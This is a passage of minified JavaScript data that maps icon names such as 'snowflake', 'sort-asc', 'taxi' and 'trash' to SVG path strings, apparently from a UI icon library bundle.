1-1V9h2c.55 0 1-.45 1-1s-.45-1-1-1z"],"small-tick":["M12 5c-.28 0-.53.11-.71.29L7 9.59l-2.29-2.3a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29s.53-.11.71-.29l5-5A1.003 1.003 0 0 0 12 5z"],snowflake:["M13.364 9l.879.879a1 1 0 1 1-1.415 1.414l-2.12-2.121A1.003 1.003 0 0 1 10.568 9H9v1.604c.042.03.083.065.121.103l2.122 2.121a1 1 0 0 1-1.415 1.415L9 13.414V15a1 1 0 0 1-2 0v-1.636l-.879.879a1 1 0 1 1-1.414-1.415l2.121-2.12c.054-.054.111-.1.172-.139V9H5.38c-.038.06-.084.118-.137.172l-2.122 2.12A1 1 0 1 1 1.707 9.88L2.586 9H1a1 1 0 1 1 0-2h1.536l-.829-.828a1 1 0 0 1 1.414-1.415L5.243 6.88c.038.038.072.079.103.121H7V5.38a1.003 1.003 0 0 1-.172-.137L4.708 3.12A1 1 0 0 1 6.12 1.707L7 2.586V1a1 1 0 1 1 2 0v1.536l.828-.829a1 1 0 0 1 1.415 1.414L9.12 5.243A1.007 1.007 0 0 1 9 5.346V7h1.604c.03-.042.065-.083.103-.121l2.121-2.122a1 1 0 0 1 1.415 1.415L13.414 7H15a1 1 0 0 1 0 2h-1.636z"],"social-media":["M9.5 4c.4 0 .8-.1 1.1-.3C12 4.5 12.9 6 13 7.6c0 .5.5.9 1 .9.6 0 1-.4 1-1v-.2c-.2-2.4-1.5-4.4-3.5-5.5-.1-1-.9-1.8-2-1.8s-2 .9-2 2 .9 2 2 2zM4 8.5c0-.7-.4-1.3-.9-1.7.3-1.4 1.2-2.6 2.5-3.3.3-.1.6-.4.6-.9s-.4-1-1-1c-.2 0-.3 0-.5.1-1.9 1-3.2 2.8-3.6 5C.4 7.1 0 7.8 0 8.5c0 1.1.9 2 2 2s2-.9 2-2zm8.8 1.2c-1.1 0-2 .9-2 2v.3c-.8.6-1.8.9-2.8.9-1.2 0-2.3-.4-3.2-1.1-.2-.2-.4-.3-.7-.3-.6 0-1 .4-1 1 0 .3.1.6.3.8C4.6 14.4 6.2 15 8 15c1.5 0 3-.5 4.1-1.3.2.1.5.1.7.1 1.1 0 2-.9 2-2s-.9-2.1-2-2.1z"],sort:["M5 12c-.28 0-.53.11-.71.29l-.29.3V9c0-.55-.45-1-1-1s-1 .45-1 1v3.59l-.29-.29A.965.965 0 0 0 1 12a1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l2-2A1.003 1.003 0 0 0 5 12zm3-9h7c.55 0 1-.45 1-1s-.45-1-1-1H8c-.55 0-1 .45-1 1s.45 1 1 1zm7 2H8c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1zm0 8H8c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1zm0-4H8c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1z"],"sort-alphabetical":["M6 12c-.28 0-.53.11-.71.29l-.29.3V9c0-.55-.45-1-1-1s-1 .45-1 1v3.59l-.29-.29A.965.965 0 0 0 2 12a1.003 1.003 0 0 0-.71 1.71l2 2c.19.18.44.29.71.29.28 0 .53-.11.71-.29l2-2c.18-.18.29-.43.29-.71a.99.99 0 0 0-1-1zm7.93-.95v-1.04H9.25v1.11h2.94L9 14.96V16h5.02v-1.11h-3.27l3.18-3.84zm-1.42-4.84l.62 1.78H15L11.94.01H10.1L7 7.99h1.81l.64-1.78h3.06zm-1.52-4.24h.02l1.03 2.93H9.92l1.07-2.93z"],"sort-alphabetical-desc":["M5.99 11.99c-.28 0-.53.11-.71.29l-.29.29V8.99c0-.55-.45-1-1-1s-1 .45-1 1v3.59l-.29-.29a1.003 1.003 0 0 0-1.42 1.42l2 2c.18.18.43.29.71.29.28 0 .53-.11.71-.29l2-2c.18-.18.29-.43.29-.71 0-.56-.45-1.01-1-1.01zM12.7 10h-1.38L9 15.99h1.36l.48-1.33h2.3l.46 1.33H15L12.7 10zm-1.51 3.67l.8-2.2h.02l.77 2.2h-1.59zm3.8-7.17h-4.57l4.45-5.12V0H8.34v1.48h4.1L7.99 6.59v1.39h7V6.5z"],"sort-asc":["M8 7h3c.55 0 1-.45 1-1s-.45-1-1-1H8c-.55 0-1 .45-1 1s.45 1 1 1zm0-4h1c.55 0 1-.45 1-1s-.45-1-1-1H8c-.55 0-1 .45-1 1s.45 1 1 1zm0 8h5c.55 0 1-.45 1-1s-.45-1-1-1H8c-.55 0-1 .45-1 1s.45 1 1 1zm-3 1c-.28 0-.53.11-.71.29l-.29.3V9c0-.55-.45-1-1-1s-1 .45-1 1v3.59l-.29-.29A.965.965 0 0 0 1 12a1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l2-2A1.003 1.003 0 0 0 5 12zm10 1H8c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1z"],"sort-desc":["M5 12c-.28 0-.53.11-.71.29l-.29.3V9c0-.55-.45-1-1-1s-1 .45-1 1v3.59l-.29-.29A.965.965 0 0 0 1 12a1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l2-2A1.003 1.003 0 0 0 5 12zm4 1H8c-.55 0-1 .45-1 1s.45 1 1 1h1c.55 0 1-.45 1-1s-.45-1-1-1zm4-8H8c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1zm-2 4H8c-.55 0-1 .45-1 1s.45 1 1 1h3c.55 0 1-.45 1-1s-.45-1-1-1zm4-8H8c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1z"],"sort-numerical":["M6 11.99c-.28 0-.53.11-.71.29l-.29.3V8.99c0-.55-.45-1-1-1s-1 .45-1 1v3.59l-.29-.29c-.18-.18-.43-.3-.71-.3a1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29.28 0 .53-.11.71-.29l2-2A1.003 1.003 0 0 0 6 11.99zm7.91-.08c-.06-.36-.17-.68-.33-.96-.16-.28-.37-.51-.64-.69-.27-.17-.61-.26-1.03-.26-.28 0-.54.06-.78.17-.23.11-.43.26-.6.45-.17.19-.3.41-.39.67a2.492 2.492 0 0 0-.04 1.52 1.623 1.623 0 0 0 .89 1.03c.22.11.45.16.68.16.26 0 .5-.05.7-.15s.38-.26.53-.5l.02.02c-.01.16-.03.34-.07.54-.03.2-.09.4-.17.57-.08.18-.18.33-.31.45s-.29.19-.5.19a.63.63 0 0 1-.48-.21c-.13-.14-.21-.31-.25-.5H10.1c.03.25.1.48.19.68.1.2.22.37.38.5.16.14.33.24.54.31s.42.1.65.1c.39 0 .72-.09.99-.27.27-.18.49-.41.66-.7.17-.29.29-.61.37-.97.08-.36.12-.72.12-1.07 0-.36-.03-.72-.09-1.08zm-1.14.54c-.04.13-.09.24-.16.34a.78.78 0 0 1-.27.24c-.11.06-.24.09-.39.09a.75.75 0 0 1-.37-.09.777.777 0 0 1-.26-.25c-.07-.1-.12-.22-.15-.35-.03-.13-.05-.26-.05-.4 0-.13.02-.26.05-.39.04-.13.09-.24.16-.34.07-.1.16-.18.26-.24s.22-.09.35-.09c.14 0 .26.03.37.09.11.06.2.14.28.24a1.32 1.32 0 0 1 .23.74c0 .15-.02.28-.05.41zm-1.56-4.47H13V0h-1.42c-.05.3-.16.56-.31.76-.16.21-.35.37-.58.5-.23.13-.49.21-.78.26-.3.05-.6.07-.91.06V2.8h2.21v5.18z"],"sort-numerical-desc":["M6 11.99c-.28 0-.53.11-.71.29l-.29.3V8.99c0-.55-.45-1-1-1s-1 .45-1 1v3.59l-.29-.29a.982.982 0 0 0-.71-.3 1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l2-2A1.003 1.003 0 0 0 6 11.99zm7.86-9.45c-.09-.48-.26-.9-.5-1.28S12.8.58 12.4.35C12 .12 11.49 0 10.86 0c-.43 0-.82.07-1.17.22s-.65.35-.9.6-.44.55-.58.89c-.14.34-.2.71-.2 1.11 0 .31.05.61.15.91.1.3.26.57.48.8.23.24.52.43.85.58.33.14.68.21 1.03.21.4 0 .75-.07 1.05-.2.3-.13.57-.35.79-.66l.02.02c-.02.21-.05.45-.1.73-.05.27-.13.53-.25.76-.12.24-.27.44-.47.6-.19.16-.44.25-.75.25a.98.98 0 0 1-.72-.29c-.19-.18-.31-.4-.37-.66H8.15c.05.34.14.64.29.9.15.26.34.49.57.67.23.18.5.32.8.41.31.1.63.15.98.15.58 0 1.08-.12 1.48-.36.4-.24.73-.55.99-.93.26-.39.44-.82.56-1.29.12-.48.18-.96.18-1.44s-.05-.96-.14-1.44zm-1.71.72c-.05.17-.14.32-.24.46-.11.13-.24.24-.41.31-.16.08-.36.12-.58.12-.21 0-.39-.04-.55-.13-.16-.08-.29-.19-.39-.33-.12-.14-.19-.29-.24-.46-.05-.17-.08-.35-.08-.54 0-.18.03-.35.08-.52.06-.16.14-.31.25-.44.11-.13.24-.24.4-.32.16-.08.33-.12.52-.12.21 0 .4.04.56.12.16.08.3.19.41.32.11.14.2.29.26.46.06.17.09.35.09.52 0 .2-.03.38-.08.55zm-.46 7.31c-.12.15-.26.28-.44.37-.17.09-.37.16-.58.2-.22.04-.44.05-.67.05v.92h1.65v3.88h1.33V10h-1.06c-.03.23-.11.42-.23.57z"],"split-columns":["M12 10a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-2-2a1.003 1.003 0 0 0-1.42 1.42l.3.29H9V2h3v1.71c.31-.13.64-.21 1-.21s.69.08 1 .21V1c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v2.71c.31-.13.64-.21 1-.21s.69.08 1 .21V2h3v5H3.41l.29-.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-2 2C.11 7.47 0 7.72 0 8c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42L3.41 9H7v5H4v-1.71c-.31.13-.64.21-1 .21s-.69-.08-1-.21V15c0 .55.45 1 1 1h10c.55 0 1-.45 1-1v-2.71c-.31.13-.64.21-1 .21s-.69-.08-1-.21V14H9V9h3.59l-.29.29c-.19.18-.3.43-.3.71z"],square:["M15 0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14H2V2h12v12z"],"stacked-chart":["M10 2c0-.55-.45-1-1-1H8c-.55 0-1 .45-1 1v3h3V2zm3 10h1c.55 0 1-.45 1-1V8h-3v3c0 .55.45 1 1 1zm2-7c0-.55-.45-1-1-1h-1c-.55 0-1 .45-1 1v2h3V5zm-5 1H7v3h3V6zM5 7c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v1h3V7zm3 5h1c.55 0 1-.45 1-1v-1H7v1c0 .55.45 1 1 1zm7 1H2c-.55 0-1 .45-1 1s.45 1 1 1h13c.55 0 1-.45 1-1s-.45-1-1-1zM3 12h1c.55 0 1-.45 1-1V9H2v2c0 .55.45 1 1 1z"],star:["M8 0l2.5 5.3 5.5.8-4 4.1.9 5.8L8 13.3 3.1 16l.9-5.8-4-4.1 5.5-.8z"],"star-empty":["M16 6.11l-5.53-.84L8 0 5.53 5.27 0 6.11l4 4.1L3.06 16 8 13.27 12.94 16 12 10.21l4-4.1zM4.91 13.2l.59-3.62L3 7.02l3.45-.53L8 3.2l1.55 3.29 3.45.53-2.5 2.56.59 3.62L8 11.49 4.91 13.2z"],"step-backward":["M12 3c-.24 0-.44.09-.62.23l-.01-.01L7 6.72V4c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h1c.55 0 1-.45 1-1V9.28l4.38 3.5.01-.01c.17.14.37.23.61.23.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],"step-chart":["M15 12H2v-2h3c.55 0 1-.45 1-1V7h2v1c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V5h1c.55 0 1-.45 1-1s-.45-1-1-1h-2c-.55 0-1 .45-1 1v3h-2V6c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1v2H2V3c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],"step-forward":["M12 3h-1c-.55 0-1 .45-1 1v2.72l-4.38-3.5v.01A.987.987 0 0 0 5 3c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1 .24 0 .44-.09.62-.23l.01.01L10 9.28V12c0 .55.45 1 1 1h1c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],stop:["M12 3H4c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h8c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],strikethrough:["M14 7H8.65c-.38-.09-.73-.18-1.04-.26-.31-.08-.49-.13-.54-.14-.43-.11-.79-.29-1.05-.52-.27-.23-.4-.55-.4-.95 0-.29.07-.53.21-.72s.32-.34.54-.46c.22-.11.46-.19.72-.24.26-.05.52-.07.77-.07.74 0 1.36.15 1.84.46.32.2.55.5.68.9h2.22c-.06-.33-.17-.64-.32-.92-.25-.45-.59-.84-1.02-1.15-.43-.31-.93-.54-1.49-.7S8.59 2 7.95 2c-.55 0-1.1.07-1.63.2-.54.13-1.02.34-1.45.62-.42.28-.76.63-1.02 1.05-.26.42-.39.92-.39 1.5 0 .3.04.59.13.88.08.26.21.51.39.75H2c-.55 0-1 .45-1 1s.45 1 1 1h7.13c.25.07.49.14.71.22.25.09.48.23.7.44.21.21.32.53.32.97 0 .21-.05.43-.14.63-.09.21-.24.39-.45.55-.21.16-.48.29-.81.39-.33.1-.73.15-1.2.15-.44 0-.84-.05-1.21-.14-.37-.09-.7-.24-.99-.43-.29-.2-.51-.45-.67-.76-.01 0-.01-.01-.02-.02H3.14a3.68 3.68 0 0 0 1.39 2.03c.46.34 1 .58 1.62.74.61.15 1.27.23 1.97.23.61 0 1.2-.07 1.79-.2.58-.13 1.11-.34 1.56-.63.46-.29.83-.66 1.11-1.11.28-.45.42-1 .42-1.64 0-.3-.05-.6-.15-.9-.05-.19-.13-.36-.22-.52H14c.55 0 1-.45 1-1s-.45-1-1-1z"],style:["M14 14H2V2h8.76l2-2H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V6.24l-2 2V14zm1.4-14L9.7 5.7l2.1 2.1L16 3.6V0h-.6zM4 11.92c2.33.15 4.42.15 6.15-1.5.82-.83.82-2.25 0-3.08-.45-.38-.98-.6-1.5-.6-.53 0-1.05.22-1.43.6-.82.91-1.27 3.38-3.22 4.58z"],"swap-horizontal":["M0 7.02L.05 7H0v.02zm2-2.03h9.57l-1.29 1.29A1.003 1.003 0 0 0 11.7 7.7l2.99-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-2.99-3a1.07 1.07 0 0 0-.71-.28 1.003 1.003 0 0 0-.71 1.71L11.57 3H2c-.55 0-1 .45-1 1a1 1 0 0 0 1 .99zM15.96 9H16v-.02l-.04.02zM14 11.01H4.43l1.29-1.29A1.003 1.003 0 0 0 4.3 8.3l-2.99 3a.99.99 0 0 0-.29.7c0 .28.11.53.29.71l2.99 3a1.003 1.003 0 0 0 1.42-1.42L4.43 13H14c.55 0 1-.45 1-1s-.45-.99-1-.99z"],"swap-vertical":["M9 0h-.02L9 .04V0zM7 16h.02L7 15.95V16zM4.7 1.31c-.18-.18-.43-.29-.7-.29s-.53.11-.71.29l-3 2.99a1.003 1.003 0 0 0 1.42 1.42L3 4.43V14c0 .55.45 1 1 1s1-.45 1-1V4.43l1.29 1.29c.18.18.43.29.7.29A1.003 1.003 0 0 0 7.7 4.3l-3-2.99zM15 9.99c-.28 0-.53.11-.71.29L13 11.57V2c0-.55-.45-1-1-1s-1 .45-1 1v9.57l-1.29-1.29a.99.99 0 0 0-.7-.29 1.003 1.003 0 0 0-.71 1.71l3 2.99c.18.18.43.29.71.29.28 0 .53-.11.71-.29l3-2.99c.18-.18.29-.43.29-.71-.01-.55-.46-1-1.01-1z"],"symbol-circle":["M8 3.01a5 5 0 1 0 0 10 5 5 0 1 0 0-10z"],"symbol-cross":["M12 6.01h-2v-2c0-.55-.45-1-1-1H7c-.55 0-1 .45-1 1v2H4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h2v2c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-2h2c.55 0 1-.45 1-1v-2c0-.56-.45-1-1-1z"],"symbol-diamond":["M12 8.01c0-.19-.07-.36-.16-.51l.01-.01-3-5-.01.01c-.17-.29-.48-.49-.84-.49s-.67.2-.84.49l-.02-.01-3 5 .02.01c-.09.15-.16.32-.16.51s.07.36.16.51h-.02l3 5 .01-.01c.18.29.49.5.85.5s.67-.2.84-.49l.01.01 3-5-.01-.01c.09-.16.16-.32.16-.51z"],"symbol-square":["M12 3.01H4c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h8c.55 0 1-.45 1-1v-8c0-.56-.45-1-1-1z"],"symbol-triangle-down":["M13 4.01c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1 0 .16.05.31.11.44H3.1l4 8h.01c.16.33.49.56.89.56s.72-.23.89-.56h.01l4-8h-.01c.06-.14.11-.28.11-.44z"],"symbol-triangle-up":["M12.89 11.56l-3.99-8h-.01c-.17-.32-.5-.55-.89-.55s-.72.23-.89.55H7.1l-4 8h.01c-.06.14-.11.29-.11.45 0 .55.45 1 1 1h8c.55 0 1-.45 1-1 0-.16-.05-.31-.11-.45z"],tag:["M1 3a2 2 0 0 1 2-2h4.584a2 2 0 0 1 1.414.586l5.413 5.412a2 2 0 0 1 0 2.829L9.827 14.41a2 2 0 0 1-2.829 0L1.586 8.998A2 2 0 0 1 1 7.584V3zm3.487-.007a1.494 1.494 0 1 0 0 2.988 1.494 1.494 0 0 0 0-2.988z"],"take-action":["M9 11a1.003 1.003 0 0 0 1.71.71l4-4a1.003 1.003 0 0 0-1.42-1.42l-4 4c-.18.18-.29.43-.29.71zM4 6c.28 0 .53-.11.71-.29l4-4A1.003 1.003 0 0 0 7.29.29l-4 4A1.003 1.003 0 0 0 4 6zm4 4l5-5-.79-.79.5-.5a1.003 1.003 0 0 0-1.42-1.42l-.5.5L10 2 5 7l.79.79-5.5 5.5a1.003 1.003 0 0 0 1.42 1.42l5.5-5.5L8 10zm7 4H7c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1z"],taxi:["M15.12 6.63h-.38L15 7c-.01.3-.01.64 0 .98V8c0 .07-.03.13-.04.19h.02L14 13.1v.9c0 .55-.45 1-1 1s-1-.45-1-1v-1H4v1c0 .55-.45 1-1 1s-1-.45-1-1v-.9l-.98-4.9h.02C1.03 8.13 1 8.07 1 8H.99c0-.33 0-.67.01-1l.26-.37H.88C.4 6.63 0 6.21 0 5.69s.4-.94.88-.94h1.05l.77-2.11c.19-.53.76-1.08 1.26-1.24 0 0 .68-.2 2.05-.32C6.01 1.05 6 1.03 6 1c0-.55.45-1 1-1h2c.55 0 1 .45 1 1 0 .03-.01.05-.02.08 1.37.12 2.05.32 2.05.32.51.15 1.08.71 1.27 1.24l.76 2.12h1.05c.49 0 .89.42.89.93 0 .52-.4.94-.88.94zM11 10h2V8h-2v2zm-8 0h2V8H3v2zm10-5l-.73-1.63C12.21 3.19 12.18 3 12 3H4c-.18 0-.21.19-.27.37L3 5c-.06.18-.18 1 0 1h10c.18 0 .06-.82 0-1z"],"text-highlight":["M9 10H2V6h7V4H1c-.55 0-1 .45-1 1v6c0 .55.45 1 1 1h8v-2zm4 3h-1V3h1c.55 0 1-.45 1-1s-.45-1-1-1h-1c-.37 0-.7.11-1 .28-.3-.17-.63-.28-1-.28H9c-.55 0-1 .45-1 1s.45 1 1 1h1v10H9c-.55 0-1 .45-1 1s.45 1 1 1h1c.37 0 .7-.11 1-.28.3.17.63.28 1 .28h1c.55 0 1-.45 1-1s-.45-1-1-1zm2-9h-2v2h1v4h-1v2h2c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1z"],th:["M15 1H1c-.6 0-1 .5-1 1v12c0 .6.4 1 1 1h14c.6 0 1-.4 1-1V2c0-.5-.4-1-1-1zM6 13H2v-2h4v2zm0-3H2V8h4v2zm0-3H2V5h4v2zm8 6H7v-2h7v2zm0-3H7V8h7v2zm0-3H7V5h7v2z"],"th-derived":["M5.6 10l-.3.3c-.2.2-.3.4-.3.7 0 .6.4 1 1 1 .3 0 .5-.1.7-.3l2-2c.2-.2.3-.4.3-.7s-.1-.5-.3-.7l-2-2C6.5 6.1 6.3 6 6 6c-.5 0-1 .4-1 1 0 .3.1.5.3.7l.3.3H1c-.6 0-1 .4-1 1s.4 1 1 1h4.6zM15 1H2c-.5 0-1 .5-1 1v5h2V5h11v2H8.8l.6.6c.1.1.2.3.3.4H14v2H9.7c-.1.1-.2.3-.3.4l-.6.6H14v2H3v-2H1v3c0 .5.5 1 1 1h13c.6 0 1-.5 1-1V2c0-.5-.4-1-1-1z"],"th-filtered":["M10 10h3l1.78-2.226a1 1 0 0 0 .22-.625V4.3l1-.9V14c0 .6-.4 1-1 1H1c-.6 0-1-.4-1-1V2c0-.5.4-1 1-1h4.333L9 4.3V5H7v2h2v1H7v2h3zm-4 3v-2H2v2h4zm0-3V8H2v2h4zm0-3V5H2v2h4zm8 6v-2H7v2h7z","M15.48 0c.31 0 .52.26.52.57 0 .16-.06.3-.17.41l-2.86 2.73v2.63c0 .16-.06.3-.17.41l-.82 1.1c-.1.1-.25.17-.41.17-.31 0-.57-.26-.57-.57V3.71L8.17.98A.566.566 0 0 1 8 .57c0-.31.26-.57.57-.57h6.91z"],"th-list":["M15 1H1c-.6 0-1 .5-1 1v12c0 .6.4 1 1 1h14c.6 0 1-.4 1-1V2c0-.5-.4-1-1-1zm-1 12H2v-2h12v2zm0-3H2V8h12v2zm0-3H2V5h12v2z"],"thumbs-down":["M2 2H0v7h2c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zm13.99 4.38c.08-.58-.44-1.02-1.15-1.05-.25-.01-.52-.03-.81-.05.02 0 .05-.01.07-.01.7-.1 1.34-.49 1.41-1.07.06-.58-.46-.97-1.17-1.04-.25-.02-.52-.04-.79-.06.47-.15.84-.42.87-.93.04-.58-.79-1.03-1.5-1.09-.27-.02-.51-.04-.73-.05h-.09c-.23-.02-.43-.02-.62-.03C8.35.95 5.66 1.47 4 2.51v6c2.14 1.29 4.76 3.59 4.21 5.51-.18.59.31 1.05.98.98.81-.09 1.37-.91 1.4-1.78.04-1-.15-2.01-.5-2.91-.04-.25.01-.5.37-.53.49-.03 1.11-.06 1.59-.08.26 0 .51-.01.75-.02h.01c.41-.02.8-.05 1.13-.09.7-.09 1.35-.47 1.43-1.05.08-.58-.44-.97-1.15-1.05-.05-.01-.11-.01-.16-.02.17-.01.33-.03.49-.05.72-.08 1.37-.46 1.44-1.04z"],"thumbs-up":["M15.99 9.62c-.08-.58-.73-.96-1.43-1.05-.15-.02-.32-.04-.49-.05.06-.01.11-.01.16-.02.71-.08 1.23-.47 1.15-1.05-.08-.58-.73-.96-1.43-1.05-.34-.04-.72-.07-1.13-.09h-.01c-.24-.01-.49-.02-.75-.02-.48-.02-1.11-.04-1.59-.08-.36-.03-.41-.28-.37-.53.35-.9.54-1.91.5-2.91-.04-.85-.6-1.68-1.41-1.77-.67-.07-1.16.39-.99.98C8.76 3.91 6.13 6.2 4 7.49v6c1.66 1.03 4.35 1.56 7.48 1.5.19 0 .39-.01.62-.02h.09c.22-.01.46-.03.73-.05.71-.06 1.54-.51 1.5-1.09-.03-.51-.4-.79-.87-.93.27-.02.54-.04.79-.06.71-.06 1.24-.45 1.17-1.04-.06-.58-.7-.97-1.41-1.07-.02 0-.05-.01-.07-.01.29-.02.57-.03.81-.05.71-.03 1.23-.47 1.15-1.05zM2 7H0v7h2c.55 0 1-.45 1-1V8c0-.56-.45-1-1-1z"],tick:["M14 3c-.28 0-.53.11-.71.29L6 10.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42l4 4c.18.18.43.29.71.29s.53-.11.71-.29l8-8A1.003 1.003 0 0 0 14 3z"],"tick-circle":["M8 16c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8zm4-11c-.28 0-.53.11-.71.29L7 9.59l-2.29-2.3a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29s.53-.11.71-.29l5-5A1.003 1.003 0 0 0 12 5z"],time:["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.69 6-6 6zm1-6.41V4c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42L9 7.59z"],"timeline-area-chart":["M15 2.59L9.91 7.68 6.6 5.2l-.01.01C6.42 5.09 6.23 5 6 5c-.24 0-.44.09-.62.23v-.01L3 7.12V11h12V2.59zM15 12H2V3c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],"timeline-bar-chart":["M8 12h1c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1H8c-.55 0-1 .45-1 1v9c0 .55.45 1 1 1zm5 0h1c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1h-1c-.55 0-1 .45-1 1v6c0 .55.45 1 1 1zm2 1H2c-.55 0-1 .45-1 1s.45 1 1 1h13c.55 0 1-.45 1-1s-.45-1-1-1zM3 12h1c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1z"],"timeline-events":["M8 11H7v1h1v-1zm-4 0H3v1h1v-1zm7-8c.6 0 1-.5 1-1V1c0-.5-.4-1-1-1s-1 .5-1 1v1c0 .5.5 1 1 1zM4 3c.5 0 1-.5 1-1V1c0-.5-.5-1-1-1S3 .5 3 1v1c0 .5.5 1 1 1zm10-2h-1v1c0 1.1-.9 2-2 2s-2-.9-2-2V1H6v1c0 1.1-.9 2-2 2s-2-.9-2-2V1H1c-.5 0-1 .5-1 1v12c0 .5.5 1 1 1h13c.6 0 1-.5 1-1V2c0-.5-.4-1-1-1zM5 13H2v-3h3v3zm0-4H2V6h3v3zm4 4H6v-3h3v3zm0-4H6V6h3v3zm4 4h-3v-3h3v3zm0-4h-3V6h3v3zm-1-2h-1v1h1V7z"],"timeline-line-chart":["M15 12H2V9.41l3-3L8.29 9.7c.18.19.43.3.71.3s.53-.11.71-.29l6-6a1.003 1.003 0 0 0-1.42-1.42L9 7.59l-3.29-3.3C5.53 4.11 5.28 4 5 4s-.53.11-.71.29L2 6.59V3c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],tint:["M7.88 1s-4.9 6.28-4.9 8.9c.01 2.82 2.34 5.1 4.99 5.1 2.65-.01 5.03-2.3 5.03-5.13C12.99 7.17 7.88 1 7.88 1z"],torch:["M5 15c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-1H5v1zm7-15H4c-.55 0-1 .45-1 1v1h10V1c0-.55-.45-1-1-1zM5 7v6h6V7l2-4H3l2 4zm2 0c0-.55.45-1 1-1s1 .45 1 1v2c0 .55-.45 1-1 1s-1-.45-1-1V7z"],train:["M13 14h-1l1 2H3l1-2H3c-1.1 0-2-.9-2-2V2C1 .9 4.13 0 8 0s7 .9 7 2v10c0 1.1-.9 2-2 2zm-2-2h2v-2h-2v2zM9 7h4V3H9v4zm-6 5h2v-2H3v2zm0-5h4V3H3v4z"],translate:["M15.89 14.56l-3.99-8h-.01c-.17-.33-.5-.56-.89-.56s-.72.23-.89.56h-.01L9 8.76 7.17 7.38l.23-.18C8.37 6.47 9 5.31 9 4V3h1c.55 0 1-.45 1-1s-.45-1-1-1H7c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1H1c-.55 0-1 .45-1 1s.45 1 1 1h6v1c0 .66-.32 1.25-.82 1.61l-.68.51-.68-.5C4.32 5.25 4 4.66 4 4H2c0 1.31.63 2.47 1.6 3.2l.23.17L1.4 9.2l.01.01C1.17 9.4 1 9.67 1 10c0 .55.45 1 1 1 .23 0 .42-.09.59-.21l.01.01 2.9-2.17 2.6 1.95-1.99 3.98h.01c-.07.13-.12.28-.12.44 0 .55.45 1 1 1 .39 0 .72-.23.89-.56h.01L8.62 14h4.76l.72 1.45h.01c.17.32.5.55.89.55.55 0 1-.45 1-1 0-.16-.05-.31-.11-.44zM9.62 12L11 9.24 12.38 12H9.62z"],trash:["M14.49 3.99h-13c-.28 0-.5.22-.5.5s.22.5.5.5h.5v10c0 .55.45 1 1 1h10c.55 0 1-.45 1-1v-10h.5c.28 0 .5-.22.5-.5s-.22-.5-.5-.5zm-8.5 9c0 .55-.45 1-1 1s-1-.45-1-1v-6c0-.55.45-1 1-1s1 .45 1 1v6zm3 0c0 .55-.45 1-1 1s-1-.45-1-1v-6c0-.55.45-1 1-1s1 .45 1 1v6zm3 0c0 .55-.45 1-1 1s-1-.45-1-1v-6c0-.55.45-1 1-1s1 .45 1 1v6zm2-12h-4c0-.55-.45-1-1-1h-2c-.55 0-1 .45-1 1h-4c-.55 0-1 .45-1 1v1h14v-1c0-.55-.45-1-1-1z"],tree:["M9 11.857V16H7v-4.143L1 